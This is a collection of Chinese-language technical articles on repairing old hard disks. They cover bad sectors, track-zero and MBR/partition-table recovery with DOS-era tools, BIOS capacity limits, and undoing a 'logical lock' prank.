    3．用一些软件对硬盘作处理，其中最典型的是PartitionMagic了。这里以4.0版本为例：扫描硬盘可以直接用PartitionMagic4中的“check”命令来完成，但该命令无自动修复功能，所以最好在PartitionMagic4中调用Windows98的相关程序来完成这个任务。标记了坏簇后，可以尝试着对它进行重新测试，方法是在Operations菜单下选择“Advanced/bad Sector Retest”；把坏簇分成一个（或多个）区后，可以考虑把该区隐藏，以免在Windows98中误操作，这个功能是通过Hide Partition菜单项来实现的。要特别注意的是，如果没有经过格式化而直接将有坏簇的分区隐藏的话，那么该分区的后续分区将由于盘符的变化而导致其中的一些与盘符有关的程序不能正确运行，比如一些软件在桌面上建立的快捷方式将找不到宿主程序，解决之道是利用Tools菜单下的DriveMapper菜单项，它会自动地收集快捷方式和注册表内的相关信息，并对它们作正确的修改。特别指出的是，在较新版的PartitionMagic5.0 Pro中，DriveMapper也升级成了3.0版本，从而使该项工作变得更加高效和简洁。另外，DiskManager这个软件也能做这个工作。隐藏了分区后，不要试图把坏道所在的分区的前后分区合并——那是徒劳无益的，因为这两个分区在物理上并不连续。
    4．对于硬盘0扇区损坏的情况，看起来比较棘手，但也不是无药可救——只要把报废的0扇区屏蔽，而用1扇区取而代之就行了，完成这项工作的理想软件是Pctools9.0，具体地说，是Pctools9.0中的DE工具，要注意的是，修改扇区完成后，只有对硬盘作格式化后才会把分区表的信息写入1扇区（现在作为0扇区了）。
    5．不到万不得已，这一招最好不要用：即对硬盘作低格。因为对硬盘作低格至少有两点害处：一是磨损盘片，二是对有坏道的硬盘来说，低格还会加速坏道的扩散。
    6．最后还有一点，那就是主板BIOS的相关内容要设置得当，特别是对于一些TX芯片组级别以前的主板，由于没有自动识别硬盘规格的能力，往往会因设置不当而影响硬盘的使用，轻则硬盘不能物尽其用，重则损伤硬盘。
    以上介绍的是硬盘有物理损伤时的解决方法。但是，这些方法大多数是消极的，是以牺牲硬盘容量为代价的。硬盘有了坏道，如果不是因为老化问题，则说明平时在使用上有不妥之处，比如对硬盘过分频繁地整理碎片、内存太少以致应用软件对硬盘频频访问等。而忽略对硬盘的防尘处理也会导致硬盘磁头因为定位困难引发机械故障。另外，对CPU超频引起外频增高，迫使硬盘长时间在过高的电压下工作，也会引发故障，所以，平时对硬盘的使用还应以谨慎操作为上策。


硬盘零磁道损坏的抢救

《一键清理系统垃圾》

硬盘零磁道损坏的抢救

    一天早上，收到友人的求救电话，告诉我他的电脑启动不了，于是下午就到了友人家中。坐下后，轻按POWER键，听着电源风扇转动声、硬盘启动声，接着“嘟”一声，自检通过。到这里松了一口气，于是判断硬件应该没有问题，多半是软件的问题。显示硬件信息后，弹出一句话，报告说没有系统盘。哦，原来是这样。

    接下来，用KV300杀毒盘启动、杀毒，什么毒都没有，按F10键，分区表也没问题。有一点奇怪，插进WIN98启动盘，执行SYS C：，重新启动。等待着“c：＞”的出现，没想到一看之下，当即傻了眼，还是那一句：没有系统盘。怎么回事？再用A盘启动，运行SCANDISK扫描C盘，在第一簇出现一个红色的“B”，零磁道损坏！

    扫描完整个硬盘，没有其它坏区。该硬盘是火球3.2G，已经过了保修期，难道只坏了零磁道就报废？突然想起PCTOOLS 9.0中的DE，该软件能看到各个分区在硬盘的起始点，能不能改呢。说干就干，用A盘启动，插入光盘，运行PCT90目录下的DE.EXE，报告现在运行在只读模式，这怎么行。先进入opions菜单，选Configuration，按空格去掉Read Only前面的勾(按Tab键切换)，保存退出。接着选主菜单Select中的Drive；进去后在Drive type项选Physical，按空格选定，再按Tall键切换到Drives项，选中hard disk，然后选OK回车。之后回到主菜单，打开Select菜单，这时会出现Partition Table，选中并进入，之后出现硬盘分区表信息.

    该硬盘有两个分区，l分区就是C盘，该分区是从硬盘的0住面开始的，那么，将1分区的Beginning Cylinder的0改成1就可以了。保存后退出。要注意的是，在修改之前先将硬盘上的重要资料备份出来。重新启动，按Delete键进入回COMS设置，进行“IDE AUTO DETECT”，可以看到CYLS由782变成781，保存退出，重新分区，格式化，至此大功告成。

    总结：PCT00LS9.0不能在用FATh32分区的硬盘和Window下运行，但可以在FAT16硬盘中运行。修改后一定要在CMOS中重新侦测硬盘，再分区和格式化。


硬盘零磁道与分区表的修复

《一键清理系统垃圾》

硬盘零磁道与分区表的修复

    零磁道处于硬盘上一个非常重要的位置，硬盘的主引导记录区（MBR）就在这个位置上。MBR位于硬盘的0磁道0柱面1扇区，其中存放着硬盘主引导程序和硬盘分区表。在总共512字节的硬盘主引导记录扇区中，446字节属于硬盘主引导程序，64字节属于硬盘分区表（DPT），两个字节（55 AA）属于分区结束标志。由此可见，零磁道一旦受损，将使硬盘的主引导程序和分区表信息遭到严重破坏，从而导致硬盘无法自举。

    零磁道损坏属于硬盘坏道之一，只不过由于它的位置太重要，因而一旦遭到破坏，就会产生严重的后果。

    通常的维修方法是通过Pctools9.0的DE（磁盘编辑器）来修复（或者类似的可以对磁盘扇区进行编辑的工具也可以），其方法如下：

    用Windows 9x启动盘启动，插入含有Pctools9.0的光盘。运行PCT90目录下的de.exe，先进入“Options”菜单，选“Configuration”（配置）命令，按下“空格”键去掉Read Only（只读）前面的勾（按Tab键切换），之后，保存退出。

    接着选择并执行主菜单“Select”（选择）中的Drive（驱动器），进去之后在“Drive type”（驱动器类型）项中，选择Physical（物理的），并按空格选定，再按“Tab”键切换到“Drives”项，选中“Hard disk”（硬盘），最后，选择“OK”并回车。

    之后，回到主菜单中，打开“Select”菜单，这时会出现Partition Table（分区表），选中并进入，之后出现硬盘分区表信息。如果硬盘有两个分区，l分区就是C盘，该分区是从硬盘的0柱面开始的，那么，将1分区的Beginning Cylinder（起始柱面）的0改成1就可以了。保存后退出。

    要注意的是，在修改之前先将硬盘上的重要资料备份出来。重新启动，按Delete键进入回CMOS设置，选“IDE AUTO DETECT”，可以看到CYLS数比原来减少了1，之后，保存设置并退出。重新分区、格式化，即可救活硬盘。

    需要注意的是：由于DE工具仅对FAT16分区的硬盘有效，因此，对于FAT32分区的硬盘来说，可以通过分区大师（PQ）等磁盘工具，将FAR32转换为FAT16，然后再对其进行处理。

    另外，有人还探索出了通过修改硬盘电机定位系统来改变零磁道位置和通过电路调整来改变磁头的分配逻辑，以达到重新定位零磁道的目的。当然这需要更深厚的硬件水平，实现起来也比较复杂。
    分区表损坏的修复

    硬盘主引导记录所在的扇区也是病毒重点攻击的地方，通过破坏主引导扇区中的DPT（分区表），即可轻易地损毁硬盘分区信息。分区表的损坏通常来说不是物理损坏，而是分区数据被破坏。因此，通常情况下，可以用软件来修复。

    通常情况下，硬盘分区之后，备份一份分区表至软盘、光盘或者USB盘上是极为明智的。这个方面，国内著名的杀毒软件KV3000系列和瑞星都提供了完整的解决方案。另外，对于没有备份分区表的硬盘，也提供了相应的修复方法，不过成功率相对较低。

    另外，中文磁盘工具DiskMan在这方面也是行家里手。重建分区表作为它的一个“杀手锏”功能，非常适合用来修复分区表损坏。

    对于硬盘分区表被分区调整软件（或病毒）严重破坏，引起硬盘和系统瘫痪，DiskMan可通过未被破坏的分区引导记录信息重新建立分区表。在菜单的工具栏中选择“重建分区表”，DiskMan即开始搜索并重建分区。DiskMan将首先搜索0柱面0磁头从2扇区开始的隐含扇区，寻找被病毒挪动过的分区表。接下来搜索每个磁头的第一个扇区。搜索过程可以采用“自动”或“交互”两种方式进行。自动方式保留发现的每一个分区，适用于大多数情况。交互方式对发现的每一个分区都给出提示，由用户选择是否保留。当自动方式重建的分区表不正确时，可以采用交互方式重新搜索。

    但是，需要注意的是，重建分区表功能不能做到百分之百的修复分区表，除非你以前曾经备份过分区表，然后通过还原以前备份的分区表来修复分区表损坏。因此可见，平时备份一份分区表是多么的必要！


硬盘启动故障解决方法三则

《一键清理系统垃圾》

硬盘启动故障解决方法三则

   相信在每一个电脑用户心中，硬盘都是占据着相当重要的地位，因为我们几乎所有平常所应用的大量重要数据都是存放在硬盘当中的，一旦硬盘出现了差错，那么受到的损失可能就是无法计算的。可是对于每一个硬件设备来说，在使用过程当中总是会出现这样或者是那样的意外情况，硬盘也是不例外的，可如果万一硬盘出现了不良情况的话，那么我们如何才能够解决好呢？ 最近收到了一些网友的来信，其中有一部分就是针对硬盘在启动的时候出现问题如何解决这方面的，我们在这里综合了一下，决定在今天先将三种大家可能会比较常见的硬盘启动故障以及如何解决故障方面的情况来给大家简单的介绍一下。
   首先就是系统没有找到或者是不能识别出硬盘，这类情况的出现导致系统无法有硬盘启动，即使我们通过其它的手段启动电脑之后也无法找到硬盘。对于这样的情况其实解决的方法还是很简单的，因为截止到目前为止，我们还没有听说过那款硬盘会出现和主板存在兼容性方面的问题，这类问题出现有很大的可能性是在硬盘和主板之间的连线上面，所以在这里我们建议大家不妨将硬盘与主板之间的连线更换一根，如果不是连线的问题的话，那么您再看一看硬盘上的主从条线是否设置正确，如何设置主从跳线的位置一般都会在硬盘上面有提示，按照您自己的需要将硬盘设置成为主盘或者是从盘即可解决这类问题。
   其次就是在BIOS设置当中的不当导致硬盘出现了一定的问题，这一类问题的出现一般并不会是用户的责任，由于现在的主板都使用有自动检测硬盘类别以及品牌型号的功能，所以我们通常不会对此作出改动，可是由于部分主板在运行时可能会出现识别硬盘类型出现错误的状况，这种情况的发生一般同样会导致系统无法从硬盘启动。此外，在主板的BIOS中还可以设置硬盘的Normal、LBA以及Large等工作模式，这各地方一定要根据硬盘的情况来进行设置，否则的话也是很有可能会出现其它的错误。对于这类情况的解决方法也不难，只要按照主板的BIOS说明以及硬盘本身的情况进行正确的设置便可以解决。
   最后就是有主引导程序而导致的启动故障，大家都知道，硬盘有一个主引导区，在这里面存有主引导程序，如果主引导程序出现了问题，那么系统不能从硬盘上启动也就是一个很正常的事情了。要想将这个故障解除并不是一个非常复杂的事情，只要您在DOS模式下输入FDISK/MBR命令便可以了，这主要是由于在FDISK命令文件当中本身就已经包含了一个硬盘的主引导程序，既然微软已经想到了，那么我们为什么不用呢。 从目前得到的情况来看，系统不能够正确引导系统的情况还有很多，不过大家常见的基本上都在本文中提到了，关于其它方面的问题以及如何解决，我们将会在未来的一段时间里继续为大家进行介绍。


硬盘容量限制问题的形成以及解决方案

《一键清理系统垃圾》

硬盘容量限制问题的形成以及解决方案

   1957年IBM公司研制成功的IBM 350（RAMAC）是第一台真正意义上的硬盘存储器，之后经历了漫长的技术革新，于80年代初期引入PC（个人电脑），当时的容量仅为20-40M，而经过10几年的发展，硬盘的容量逐步提高，而当时一些设计上的失误就造成了今天可能出现的硬盘容量限制问题。（容量限制问题：就是系统无法完全识别或正常使用超过一定容量的硬盘）
容量限制问题的成因

要明白这个原因我们需要对IDE接口硬盘的工作方式做一个介绍，即使到现在我们今天的IDE硬盘驱动依旧使用早先的DOS-BIOS（磁盘操作系统-基本输入/输出系统）的分层结构上。它的基本工作模式就是：程序调用->DOS功能调用->文件管理设备->INT 13中断管理（读/写）->BIOS磁盘服务->IDE（ATA）界面->磁盘控制器，也就是说我们如果需要对硬盘进行操作必须通过以上的一系列步骤才能完成，那么我们以下一起来看看这一系列步骤的作用。

文件管理设备：其负责文件及其在磁盘上存储位置之间的映射关系，不过需要通过磁盘读写中断INT13执行读写命令来存储、调入文件。当新文件被保存时，文件管理器决定它在当前目录里的存储位置，在文件分配表中为这个新文件添加文件目录项，并把文件写入磁盘。当读文件时，文件管理器在FAT中找到文件在磁盘上的位置，接着就调入文件。

IDE（ATA） 界面：在介绍IDE（ATA）界面前，简单说说硬盘的结构：硬盘分为一定数量的柱面（以硬盘中心为圆心的同心圆磁迹），每个柱面都需要磁头来读写数据。另外，硬盘上的数据都是以每扇区512字节的格式存储的，所有的数据传输都是以扇区（柱面被等分的园弧磁迹）为单位的。IDE（ATA）界面是寄存器驱动式的并口总线。要传输数据，BIOS首先往IDE（ATA）里特定的寄存器写入数据的开始地址和数据传输的长度，再把有关的读/写命令往特定的寄存器里发送从而开始数据传输。

现在的硬盘一般都支持逻辑块寻址(LBA)和柱面磁头扇区寻址(CHS),我们以CHS寻址方式来举例：数据传输的开始地址是写到4个8位寄存器里的，分别是：

柱面低位寄存器
柱面高位寄存器
扇区寄存器
设备/磁头寄存器
因此，柱面地址是16位[柱面低位寄存器（8位），柱面高位寄存器（8位）]。扇区地址是8位（注意：扇区寄存器里第一个扇区是1扇区，而不是0扇区）。而磁头地址是4位（没有完全占用8位）。因此，硬盘柱面的最大数是65,536（2的16次方），磁头的最大数是16（2的4次方），扇区的最大数是255（2的8次方-1，注意刚刚我们提到的扇区寄存器问题)。所以，能寻址的最大扇区数是267,386,880 (65,536x16x255)。一扇区又是512字节，也就是说如果以CHS寻址方式，IDE硬盘的最大容量为136.9GB。LBA寻址方式，上述的总共28位可用的寄存器空间(16+8+4)被看作一个完整的LBA地址，因为包括位0（CHS里扇区不能从0开始计算），其能寻址的扇区数是268,435,456 (65,536x16x256)，这时IDE硬盘的最大容量为137.4GB。

INT 13管理：INT 13管理其实也是按照寄存器的模式来设计的，它的高层即文件管理器层发布数据读写命令和有关的参数给CPU，然后触发INT 13中断的进行，激活BIOS的磁盘服务来执行数据传输。数据的开始地址被写到3个8位寄存器里，分别是：

柱面低位寄存器
柱面高位/扇区寄存器
磁头寄存器
柱面地址是10位（柱面低位寄存器占用8位、柱面高位寄存器占用2位），扇区地址为6位（8位－已经被计算过的高位寄存器的2位）。磁头寄存器为8位。因此如果这样的话：柱面的最大数是1024（2的10次方） ，磁头的最大数是256（2的8次方），扇区的最大数是63（2的6次方-1)。所以，通过INT 13管理能寻址的扇区数是16,515,072 (1,024x256x63)。一扇区是512字节，也就是说如果以CHS寻址方式，IDE硬盘的最大容量为8.456GB。LBA寻址方式能寻址的扇区数是16,777,216(1024x256x64)，这时IDE硬盘的最大容量为8.601GB。

看到这里，我们应该感到硬盘容量限制的成因有了一些“眉目”了吧，那么我们具体来到底是什么让硬盘出现了所谓的限制：

1.528MB的容量限制：

由于早先的硬盘容量比较小，因此设计的BIOS的时候当把地址从Int 13的地址寄存器转换为IDE（ATA）的地址寄存器时，仅仅把INT 13管理中10位的柱面地址用来对应IDE（ATA）界面中的16位柱面寄存器，而把没有用到的6位（高位寄存器）地址都设定为0。并且也仅把6位的扇区地址来对应IDE（ATA）界面的8位扇区寄存器，其中没有用到的2位设置为0。并且INT 13管理的磁头寄存器4位（又去掉了4位）来对应IDE（ATA）。因此，此时的磁盘柱面最大数为1024（2的10次方），磁头的最大数是16（2的4次方），扇区的最大数是63（2的6次方-1)。因此能寻址的扇区数就成了1,032,192(1,024x16x63)。一个扇区的容量是512字节，也就是说如果以CHS寻址方式，IDE硬盘的最大容量为528.4MB。因此528MB的硬盘容量限制就出现了。

2.1GB的容量限制：

这里分为两个部分，一部分是由磁盘服务的限制造成的，另外一个是由于磁盘格式造成的，通常我们把前者称为2.1GB的硬件容量限制，后一种称为2.1GB的软件容量限制。

硬件容量硬件

当时，为了528MB容量限制的问题，人们提出一些不同的办法，其中一个办法就是INT 13服务的磁头寄存器没有用到的4位中的2位（确切的说是高2位）保留给柱面数的第11、12位使用。这样，最大的磁头数就是64（2的6次方）。但是，当时的操作系统不使用这种转换方法，其认为磁头寄存器的所有位数只可能记录磁头数。比如，为了正确地转换柱面数为2,048、磁头数为64的硬盘，就需要操作系统把柱面数除以4（512个逻辑柱面数），磁头数乘以4（256个逻辑磁头数）。不过由于BIOS中并没有开放所有的磁头数寄存器，当然无法记录这样的磁头数。因此遇到这种运行机制的BIOS，在系统自检的时候就会造成系统当机。

软件容量限制

当时DOS分区的限制是由文件分配表（FAT）决定的。FAT处理存储空间是以簇为单位的，它处理一簇的最大长度是32,768字节，最多能处理65,536个簇，如果将两个数字相乘，就会得到DOS的最大分区界限值是2,147,483,648字节或2,048MB(2,147,483,648 /1,0242)。因此超过这个容量的硬盘，如果使用FAT格式，就最大只能识别2.048GB的硬盘容量。

3.2GB的容量限制：

一些版本的BIOS不能识别超过6322柱面的硬盘，不过这种BIOS比较少见，由于柱面有限制，其最高支持扇区数为6,372,576（6322x16x63），如果乘以512扇区容量的话，其最高支持容量为6,372,576x512＝3,262,758,912/1024=3.18GB。

4.2GB的硬盘容量限制：

当时一些操作系统使用8位寄存器来存储磁头数，这样当BIOS报告硬盘的磁头数等于256(最高容量)时，只有磁头数的最先一位（即0）被系统保存，从而导致硬盘配置错误。一旦硬盘的磁头数是16，柱面数大于8,192(2的13次方，由于后三位寄存器已经被磁头寄存器借用，其实这里牵涉到一个突破528MB容量限制的转换做法的问题，由于这一段比较负责，在这里就不详细介绍了，我们只要明白有这个限制就够了)，系统就无法正常识别了，因此其最大的容量就被限制在了4.2GB＝8192x16x63x512/1024。

8.4GB的容量限制

我们已经知道INT 13服务的寻址方式最高可以支持8.4GB以下的容量（柱面数、磁头数、扇区数的最大值分别是16,383、16和63，而三者相乘就是8.456GB）。因此，这个容量限制出现是迟早的问题了。所以，这个限制是我们目前最常遇到的容量限制。为了解决这个问题，一些厂商定义了新的扩展INT 13服务扩展标准。新的INT 13服务扩展标准不使用操作系统的寄存器传递硬盘的寻址参数，它使用存储在操作系统内存里的地址包。地址包里保存的是64位LBA地址，如果硬盘支持LBA寻址，就把低28位直接传递给ATA界面，如果不支持，操作系统就先把LBA地址转换为CHS地址，再传递给ATA界面。通过这种方式，能实现在ATA总线基础上CHS寻址最大容量是136.9 GB，而LBA寻址最大容量是137.4GB。

33.8GB的容量限制

在CHS寻址中，由于IDE(ATA)界面的限制，柱面数最高支持65,535（2的16次方－1），所以，当遇到柱面数大于65,535的时候，系统就无法识别这种硬盘了，不过LBA由于独特的寻址模式就不存在这个问题，这个容量限制具体为：65535x16x63x512/1024=33.8GB。

137GB的容量限制

相信这个问题就不用提了，目前的磁盘工作方式就注定IDE硬盘存在这个问题，前面介绍IDE(ATA)界面的时候，这个问题就已经出现了 那么遇到容量限制问题的时候，系统会出现什么状况呢？并且遇到这些问题如何解决呢？

容量限制的症状和解决方法：

528 MB

症状：无论硬盘容量有多大，操作系统识别不超过528MB。
解决方法：LBA模式设置硬盘，不过当时很多硬盘和BIOS都不支持这种设置，因此只能更换主板

2.1 GB

硬件问题

症状：在加电自检时当机
解决方法：升级BIOS、强制硬盘跳线、LBA模式设置硬盘

软件问题

症状：分区的时候发现主分区划分2.1GB的容量
解决方法：更换FAT 32文件分配（不过早先的一些软件就无法使用了，并且不支持这个文件格式的操作系统也无法使用）划分多个分区

3.2GB

症状：在加电自检时当机
解决方法：升级BIOS、LBA模式设置硬盘

4.2GB

症状：在硬盘上创建分区后，再启动机器时当机。
解决方法：升级BIOS、LBA模式设置硬盘

8.4GB

症状：系统报告硬盘容量不超过8.4GB，在BIOS自检的时候可能会报硬盘参数错误并当机
解决方法：升级BIOS、采用专用的分区软件

33.8GB
症状：系统自检的时候当机
解决方法：升级BIOS，使用专用的硬盘管理软件、强制硬盘跳线、使用LBA模式管理硬盘

137GB
症状：无法识别硬盘或者系统自检的时候当机
解决方法：需要硬盘和主板（可以用ATA 133控制卡来支持）都支持最新的ATA 133规范（ATA 133规范是刚刚由Maxtor提出的一种新的硬盘传输规范，其把目前最高的28位可用的寄存器空间提高到48位，从而支持更大的硬盘）

解决方案的要点：

硬件解决方法：

从硬件思路上来看，既然很多问题都是由BIOS引起的，那么升级到合适的版本也就可以突破很多容量限制了，比如：3.2GB、4.2GB、8.4GB、33.8GB，这也是目前解决硬盘容量限制最简单的办法了。

另外选择BIOS扩展卡也是一个解决方法，不过此方法用于老主板上，目前的主板的BIOS都支持擦写，BIOS扩展卡使用起来即麻烦又要我们多投入一些金钱。

软件解决方法

从上面的解决方法来看，很多方法就是只要硬盘支持LBA寻址模式就可以解决问题了，因此一些公司推出了针对这个问题修补方法，其中最优秀的就是Maxtor的MaxBlast和Western Digital的EZ Drive了，这两种解决方法其实就是软件解决方法，它们可以转换大容量硬盘的各个参数，从而达到全容量使用硬盘的目的。不过这类软件并不是在操作系统启动后才加载的（在磁盘分区建立一个磁盘的管理BIOS，通过它来同系统BIOS进行联系），而是在BIOS启动后、操作系统启动前加载的，所以实现也比较简单。

另外使用专用的硬盘分区软件也是一个不错的解决方法，由于新版本的硬盘分区软件已经附带了INT 13扩展标准因此可以支持更大容量的硬盘，不过它也是同MaxBlast和EZ Drive一样会系统启动后加载INT 13扩展，当遇到硬盘分区表破坏或者覆盖后，磁盘使用会再次出现问题。

操作系统的限制：

目前又几种操作系统不支持大容量的硬盘：DOS 6.22或更低的版本，不支持大于8.4 GB的硬盘，并且没有办法解决。Windows 95（NT 3.5x）支持INT 13扩展、支持更大容量的硬盘，不过FAT 16限制其每分区最大支持的容量仅为2GB。另外以上两种操作系统都不支持FAT 32格式，因此要使用大硬盘尽量不要采用以上的操作系统。Windows NT 4.0存在一个奇怪的问题：当启动分区的容量大于8.4 GB时，NT就不能使用超过8.4 GB的其它硬盘空间了，因此使用此操作系统要注意。

综上所说，大家应该对磁盘容量限制的成因和解决方法有一个比较感性的认识了吧，一般来说避免容量限制问题的出现就是：更新BIOS，尽量不是用CHS硬盘寻址模式。以上两点是解决容量限制最简单和有效的办法，因为我们无需投入任何费用，并且对所有用硬盘都适用，并且无须进行烦琐的软件设置或安装。

附：一种新的8.4GB容量限制问题解决方法：

一大容量硬盘，在BIOS中限制仅为8.4GB大小，不管它，保存CMOS信息，启动系统执行FDISK，在系统认出的8.4GB硬盘上先分出一个分区（即为C盘，大小随意），在分出的分区（C盘）上将WINDOWS系统装好。（注意，只能先分出一个分区）然后，将此大硬盘接在能认出大硬盘全部容量的电脑上，将剩下的容量全部分完（注意，每个逻辑分区容量不能大于8.4GB），最后，再将此大硬盘接回不能识别8.4GB以上容量的电脑上，CMOS仍将此硬盘认为8.4GB，不管他，保存CMOS信息后重启系统，进入WINDOWS系统，发现所有的逻辑盘全部存在，格式化后即可使用。

注：以上的分区必须按照FAT 32模式来进行

这种办法对那些已经停止更新BIOS的主板来说非常有用，并且不需要任何软件介入，大家有空试试吧。


硬盘软故障的排除

《一键清理系统垃圾》

硬盘软故障的排除

   硬盘的软故障即非物理性故障，比如主引导记录、分区表、启动文件等被破坏而导致系统无法启动，硬盘被病毒感染造成无法运行，以及非法操作、维护不当等。
   主引导记录损坏
   由于病毒的破坏或操作上的失误，使硬盘主引导记录损坏，硬盘将无法启动。开机后系统提示“Disk boot failure , Insert system disk and press enter”，告诉您找不到启动分区硬盘或者硬盘上没有启动文件，请插入启动盘后按“回车”键。如果BIOS中的硬盘设置正确，而且可以从软盘或光盘启动后能找到您的硬盘，那么您的机器不过是因为Windows启动文件或硬盘的主引导扇区被破坏罢了。
   硬盘的主引导扇区是硬盘中的最为敏感的一个部件，其中的主引导程序用于检测硬盘分区的正确性并确定活动分区，负责把引导权移交给活动分区的DOS或其他操作系统，此段程序损坏将无法从硬盘引导。
   修复此故障最简单的方法就是使用高版本DOS的Fdisk带参数/mbr运行(即执行“FDISK/MBR”命令)，直接覆盖(重写)硬盘的主引导程序(fdisk.exe之中包含完整的硬盘主引导程序)的代码区。由于从DOS时代直到目前的Windows系统，硬盘的主引导程序一直没有变化，所以只要找到一种DOS引导盘启动系统并运行此程序即可修复。
   在硬盘主引导扇区中还存在一个非常重要的部分，那就是其最后的两个字节：55AA，此为扇区的有效标志。当从硬盘、软盘或光区启动时，将检测这两个字节，如果存在则认为有硬盘存在，否则将不承认硬盘。
   Fixmbr
   Fixmbr是一个DOS下的应用小工具，只有12KB，专门用于重新构造主引导扇区。直接运行Fixmbr，它将检查MBR结构，如果发现系统不正常则会出现是否进行修复的提示。如果回答“Yes”，它将搜索分区。当搜索到相应的分区以后，系统会提示是否修改MBR，回答“Yes”则开始自动修复。如果这时出现死机现象，请将BIOS中的防病毒功能禁止后再做。缺省的状态下将搜索所有已经存在的硬盘，并完成以上操作。如果完成的结果不对，可以用“/Z”参数将结果清空后重新启动，就可以恢复到原来的状态。
   执行“FIXMBR /?”可得到FIXMBR的帮助信息如下：
   Usage:FIXMBR[DriveNo][/A][/D][/P][/Z][/H]DriveNoHarddiskscope0-3,defaultisalldrive.(指硬盘号，0表示第一个硬盘)/AActiveDOSpartition.(激活基本DOS分区)/PDisplaypartition.(显示DOS分区的结构)/DDisplayMBR.(显示主引导记录内容)/ZZeroMBR.(将主引导记录填零)/HThismessage.(本帮助信息)
   KV3000
   KV3000具有非常强大的主引导记录和分区修复的功能。我们可以先用软盘启动后，执行KV3000，按下“F6”键，就可查看已经不能引导的硬盘隐含扇区，即查看硬盘0面0柱1扇区主引导信息是否正常。如果在这里没有找到关键代码，即硬盘分区表关键代码“80”、“55AA”，那么硬盘本身将不能引导，即使软盘引导后也不能进入硬盘。这时，可按动翻页键“PgDn”或“PgUp”键，在硬盘的隐含扇区内查找，如有，会在表中出现闪动的红色“80”和“55AA”，并响一声来提示你，下行会出现一行提示，“F9 = Save To Side 0 Cylinder 0 Sector 1 !!!”。这时，按一下“F9”键，就可将刚找到的在表中显示出的原硬盘主引导信息，覆盖到硬盘0面0柱1扇区中，然后机器会重新引导硬盘，恢复硬盘的主引导记录。
   硬盘被“逻辑锁”锁定
  “硬盘逻辑锁”是一种很常见的恶作剧手段。中了逻辑锁之后，无论使用什么设备都不能正常引导系统，甚至是软盘、光驱、挂双硬盘都一样没有任何作用。
  “逻辑锁”的上锁原理：计算机在引导DOS系统时将会搜索所有逻辑盘的顺序，当DOS被引导时，首先要去找主引导扇区的分区表信息，然后查找各扩展分区的逻辑盘。“逻辑锁”修改了正常的主引导分区记录，将扩展分区的第一个逻辑盘指向自己，使得DOS在启动时查找到第一个逻辑盘后，查找下个逻辑盘总是找到自己，这样一来就形成了死循环。
   给“逻辑锁”解锁比较容易的方法是“热拔插”硬盘电源。就是在当系统启动时，先不给被锁的硬盘加电，启动完成后再给硬盘“热插”上电源线，这样系统就可以正常控制硬盘了。这是一种非常危险的方法，为了降低危险程度，碰到“逻辑锁”后，大家最好依照下面两种比较简单和安全的方法处理。
   UltraEdit
   首先准备一张启动盘，然后在其他正常的机器上使用二进制编辑工具(推荐UltraEdit)修改软盘上的IO.SYS文件(修改前记兹将该文件的属性改为正常)，具体是在这个文件里面搜索第一个“55AA”字符串，找到以后修改为任何其他数值即可。用这张修改过的系统软盘你就可以顺利地带着被锁的硬盘启动了。不过这时由于该硬盘正常的分区表已经被破坏，你无法用“Fdisk”来删除和修改分区，但是此时可以用前面介绍的关于分区表恢复的方法来处理。
   DM
   因为DM是不依赖于主板BIOS来识别硬盘的硬盘工具，就算在主板BIOS中将硬盘设为“NONE”，DM也可识别硬盘并进行分区和格式化等操作，所以我们也可以利用DM软件为硬盘解锁。
   首先将DM拷到一张系统盘上，接上被锁硬盘后开机，按“Del”键进入BIOS设置，将所有IDE接口设为“NONE”并保存后退出，然后用软盘启动系统，系统即可“带锁”启动，因为此时系统根本就等于没有硬盘。启动后运行DM，你会发现DM可以识别出硬盘，选中该硬盘进行分区格式化就可以了。这种方法简单方便，但是有一个致命的缺点，就是硬盘上的数据保不住了＾＿＾。
   分区表遭到破坏
   分区表错误是硬盘最严重的错误之一，分区表数据的损坏将造成该分区的混乱或丢失，一般无法进行手工恢复，惟一的方法是用备份的分区表数据重新写回，或者从其他的相同类型的并且分区状况相同的硬盘上获取分区表数据，否则将导致其他的数据永久的丢失，然而以下这些工具将帮助我们把损失降到最低限度。
   KV3000
   在KV3000的主菜单上，按下“F10”键，就可对系统的有关参数和硬盘分区表快速测试，如果硬盘分区表不正常，KV3000会先将坏分区表保存到软盘上以防不测，再自动重建硬盘分区表，使硬盘起死回生。但如果硬盘只有一个分区，而且文件分配表(FAT表)、文件目录表(ROOT表)严重损坏，数据已经都没有了。那么，用这个功能即使恢复了C盘分区表，数据也不能恢复。这时需要配合其他的硬盘修复工具来恢复数据。如果硬盘还有D、E……等几个分区，一般情况下，KV3000能找回后面没有被破坏掉的分区，重建一个新的硬盘分区表，然后，再用DOS系统软盘引导机器后，就可进入硬盘后面几个分区，将数据导出后，再将硬盘重新分区、格式化。
   Disk Genius
   Disk Genius，全中文经典硬盘分区表维护软件，采用纯中文图形界面，支持鼠标操作。作为一款硬盘分区管理工具，它不仅有建立分区、删除分区、激活分区等功能，而且还具有其他工具所无法比拟的优势：
   (1)提供更灵活的分区操作，支持分区参数编辑；(2)提供强大的分区表重建功能，迅速修复损坏了的分区表；(3)支持FAT/FAT32分区的快速格式化；(4)在不破坏数据的情况下直接调整FAT/FAT32分区的大小；(5)自动重建被破坏的硬盘主引导记录；(6)为防止误操作，对于简单的分区动作，在存盘之前仅更改内存缓冲区，不影响硬盘分区表；(7)能查看硬盘任意扇区，并可保存到文件；(8)可隐藏FAT/FAT32及NTFS分区；(9)可备份包括逻辑分区表及各分区引导记录在内的所有硬盘分区信息；(10)提供扫描硬盘坏区功能，报告损坏的柱面。
   Disk Genius的最过人之处就在于它的硬盘分区表恢复功能，主要用于当硬盘分区表被破坏时，通过未被破坏的分区引导记录信息重新建立分区表。进入“工具”菜单，选择“重建分区表”进行硬盘分区，这时系统会给出“自动方式或交互方式”，一般情况下选择“自动方式”，而交互方式对发现的每一个分区都给出提示，由用户选择是否保留。只要硬盘没有被格式化，一般是可以恢复硬盘的分区表的，修复后必需存盘退出，重新启动系统即可正常。


硬盘软故障排除的基本知识

《一键清理系统垃圾》

硬盘软故障排除的基本知识

    现在的硬盘发展速度越来越快，许多用户目前都已购买了大容量的硬盘。硬盘是计算机中比较容易出现故障的设备，当硬盘出现故障时，许多宝贵数据有可能都要付诸东流了，有没有能使硬盘起死回生的办法呢？下面给大家介绍一些解决硬盘软故障的基本方法。

首先介绍一下硬盘的组成，一个硬盘基本是由两部分组成：
    1．磁头－盘片组件（Head Disk Assembly）,简称头盘组件(HDA)；
    2．印刷电路板组件(Printed Circuit Board Assembly),简称PCBA。
